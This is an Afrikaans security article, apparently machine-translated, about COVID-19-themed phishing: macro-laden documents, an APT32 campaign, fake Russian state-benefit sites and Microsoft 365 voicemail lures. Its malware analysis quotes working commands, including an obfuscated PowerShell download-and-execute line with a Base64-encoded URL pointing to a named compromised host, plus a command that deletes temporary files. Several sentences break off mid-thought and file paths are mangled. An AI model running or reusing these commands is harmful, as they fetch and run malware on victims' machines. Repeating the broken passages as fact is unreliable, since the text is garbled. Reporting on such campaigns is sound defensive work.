Aanvallers gaan voort om die COVID-19-onderwerp uit te buit, wat meer en meer bedreigings skep vir gebruikers wat baie belangstel in alles wat met die epidemie verband hou. IN
Onthou in
Wil jy 'n gratis toets vir COVID-19 hê?
Nog 'n belangrike voorbeeld van uitvissing met 'n koronavirus-tema was
Dit was ook maklik om die meeste gebruikers te oortuig om makro's te aktiveer. Om dit te doen, is 'n standaard truuk gebruik: om die vraelys in te vul, moet jy eers makro's aktiveer, wat beteken dat jy 'n VBA-skrip moet laat loop.
Soos u kan sien, is die VBA-skrip spesiaal gemasker van antivirusse.
Windows het 'n wagfunksie waar die toepassing /T <sekondes> wag voordat die verstek "Ja"-antwoord aanvaar word. In ons geval het die skrip 65 sekondes gewag voordat tydelike lêers uitgevee is:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
En terwyl daar gewag word, is wanware afgelaai. 'n Spesiale PowerShell-skrip is hiervoor bekendgestel:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Nadat die Base64-waarde gedekodeer is, laai die PowerShell-skrip die agterdeur af wat op die voorheen gehackte webbediener van Duitsland geleë is:
http://automatischer-staubsauger.com/feature/777777.png
en stoor dit onder die naam:
C:UsersPublictmpdirfile1.exe
Map ‘C:UsersPublictmpdir’
word uitgevee wanneer die 'tmps1.bat'-lêer uitgevoer word wat die opdrag bevat cmd /c mkdir ""C:UsersPublictmpdir"".
Doelgerigte aanval op regeringsinstansies
Boonop het FireEye-ontleders onlangs 'n geteikende APT32-aanval gerapporteer wat gemik is op regeringstrukture in Wuhan, sowel as die Chinese Ministerie van Noodbestuur. Een van die verspreide RTF's bevat 'n skakel na 'n New York Times-artikel getiteld
Interessant genoeg, ten tyde van opsporing, het geen van die antivirusse hierdie geval opgespoor nie, volgens Virustotal.
Wanneer amptelike webwerwe af is
Die treffendste voorbeeld van 'n uitvissing-aanval het net nou die dag in Rusland plaasgevind. Die rede hiervoor was die aanstelling van 'n langverwagte voordeel vir kinders van 3 tot 16 jaar. Toe die begin van die aanvaarding van aansoeke op 12 Mei 2020 aangekondig is, het miljoene hulle na die Staatsdienste-webwerf gehaas vir die langverwagte hulp en die portaal nie erger as 'n professionele DDoS-aanval afgebring nie. Toe die president gesê het dat "Staatsdienste nie die vloei van aansoeke kon hanteer nie," het mense aanlyn begin praat oor die bekendstelling van 'n alternatiewe webwerf om aansoeke te aanvaar.
Die probleem is dat verskeie werwe tegelyk begin werk het, en terwyl een, die regte een by posobie16.gosuslugi.ru, eintlik aansoeke aanvaar, meer
Kollegas van SearchInform het ongeveer 30 nuwe bedrieglike domeine in die .ru-sone gevind. Infosecurity en Softline Company het sedert die begin van April meer as 70 soortgelyke vals staatsdienswebwerwe opgespoor. Hulle skeppers manipuleer bekende simbole en gebruik ook kombinasies van die woorde gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, ensovoorts.
Hype en sosiale ingenieurswese
Al hierdie voorbeelde bevestig net dat aanvallers die onderwerp van koronavirus suksesvol monetiseer. En hoe hoër die sosiale spanning en hoe meer onduidelike kwessies, hoe meer kanse het swendelaars om belangrike data te steel, mense te dwing om hul geld op hul eie prys te gee, of bloot meer rekenaars te hack.
En aangesien die pandemie potensieel onvoorbereide mense gedwing het om massaal tuis te werk, is nie net persoonlike nie, maar ook korporatiewe data in gevaar. Byvoorbeeld, onlangs is Microsoft 365 (voorheen Office 365)-gebruikers ook aan 'n uitvissing-aanval onderwerp. Mense het massiewe "gemis" stemboodskappe as aanhangsels by briewe ontvang. Die lêers was egter eintlik 'n HTML-bladsy waarna die slagoffers van die aanval gestuur is
Bron: will.com